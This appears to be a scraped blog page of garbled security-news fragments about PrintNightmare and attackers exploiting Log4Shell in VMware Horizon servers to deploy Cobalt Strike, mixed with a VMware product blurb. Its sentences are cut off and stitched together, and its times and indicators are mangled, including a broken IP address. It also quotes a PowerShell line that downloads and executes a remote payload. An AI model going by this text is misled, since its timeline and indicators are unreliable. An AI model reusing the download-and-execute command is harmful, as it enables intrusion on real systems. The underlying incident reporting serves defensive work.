![]() 'Since December 2021, multiple threat actor. The vulnerability, dubbed PrintNightmare and tracked as CVE-2021-34527, is located in the Windows Print Spooler service and the public exploits available for it are being improved. This new EDR capability is based on an acquisition we made in early 2021 and allows us to proactively detect and respond to non-persistent malicious behavior by giving us the ability to collect detailed information about processes. Cybersecurity and Infrastructure Security Agency (CISA), along with the Coast Guard Cyber Command (CGCYBER), on Thursday released a joint advisory warning of continued attempts on the part of threat actors to exploit the Log4Shell flaw in VMware Horizon servers to breach target networks. Huntress reports that attackers have started to exploit the Log4Shell vulnerabilities revealed in December 2021 on servers running VMware Horizon to deploy Cobalt Strike. Iex ((New-Object ).DownloadString('116:8080/drv'))Īt 1938 ET, we started deploying Huntress' soon-to-be-released Process Insights agent to all of the VMware Horizon servers we protect. VMware’s mobile device security Workspace ONE Mobile Threat Defense (MTD), powered by Lookout integrates with Workspace ONE in a unique way with the key services of the suite, Unified Endpoint Management (UEM), Intelligence and most importantly, embedded within the Intelligence Hub agent to form a robust endpoint protection suite onto these. These two hosts were from two different partners, but the commonalty was VMware Horizon server.Īdditional security researchers including TheDFIRReport and Red Canary reported similar behavior around the same time-confirming a PowerShell based downloader executed a Cobalt Strike payload that was configured to call back to 185.112.83116 for command and control. Days later, threat actors were installing Cobalt Strike implants in multiple VMware Horizon servers. ![]() ![]() At 1518 ET another Managed Antivirus detection for Cobalt Strike on another host was identified. Log4Shell vulnerabilities in VMware Horizon were exploited to create web shells in January 2022, less than a month after the vendor issued security updates following initial Log4j vulnerability disclosures. On January 14 at 1458 ET, an unrelated Managed Antivirus detection (Microsoft Defender) tipped our ThreatOps team to a Cobalt Strike implant.
0 Comments
Leave a Reply. |
Details
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |